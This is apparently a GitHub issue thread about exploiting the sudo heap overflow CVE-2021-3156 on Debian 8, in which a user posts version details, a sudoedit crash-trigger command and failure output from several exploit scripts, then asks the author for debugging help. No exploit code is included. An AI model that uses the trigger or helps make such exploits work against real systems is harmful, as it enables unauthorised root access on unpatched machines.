CVE-2021-3156

Exploitation on Debian 8 (jessie)

Open xhat007 opened this issue 3 years ago • 2 comments

Hi @worawit

Is exploitation possible on Debian 8?

$ sudo --version
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3

$ uname -r
3.16.0-4-amd64

$ sudoedit -s '01234567890123456789'
*** Error in `sudoedit': malloc(): memory corruption: 0x00005637fc4a7ea0 ***
Aborted

I tried the following exploits:

$ python exploit_nss_u14.py
Segmentation fault

$ python exploit_nss_u16.py
Segmentation fault

$ python exploit_nss_d9.py
Segmentation fault

$ python exploit_userspec.py

curr size: 0x1600

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005634c93fcbd0 ***

curr size: 0x1b00

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055bbd93f80d0 ***

curr size: 0x1d80

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055a8debe8350 ***

curr size: 0x1ec0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x0000562e47bd3490 ***

curr size: 0x1f60

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x0000561a4e9e9530 ***

curr size: 0x1fb0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005564bab37580 ***

curr size: 0x1fd0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055bcb07335a0 ***

curr size: 0x1fe0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055fd181b45b0 ***

curr size: 0x1ff0

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005587a03975c0 ***

has 2 holes. very big one is bad

curr size: 0xc00

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x00005651a540e1e0 ***

curr size: 0x1000

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055f198e1f5e0 ***

curr size: 0x1400

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x0000563b20a3d9e0 ***

curr size: 0x1800

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055b4f44c6de0 ***

curr size: 0x1c00

exit code: 6 *** Error in `sudoedit': malloc(): memory corruption: 0x000055d6e1c371e0 ***

Traceback (most recent call last):
  File "exploit_userspec.py", line 736, in <module>
    main()
  File "exploit_userspec.py", line 652, in main
    cmnd_size = find_cmnd_size()
  File "exploit_userspec.py", line 173, in find_cmnd_size
    assert found, "Cannot find cmnd size"
AssertionError: Cannot find cmnd size

Any help would be appreciated!

xhat007, May 02 '21 16:05

I have not tested on Debian 8. From the sudo and glibc versions, it should be exploitable.

From the output, my exploit fails at the first step. I cannot help you with this case because debugging is needed.

worawit, May 12 '21 12:05

Hi @worawit

What do I need to do to debug?

Thanks.

xhat007, May 18 '21 00:05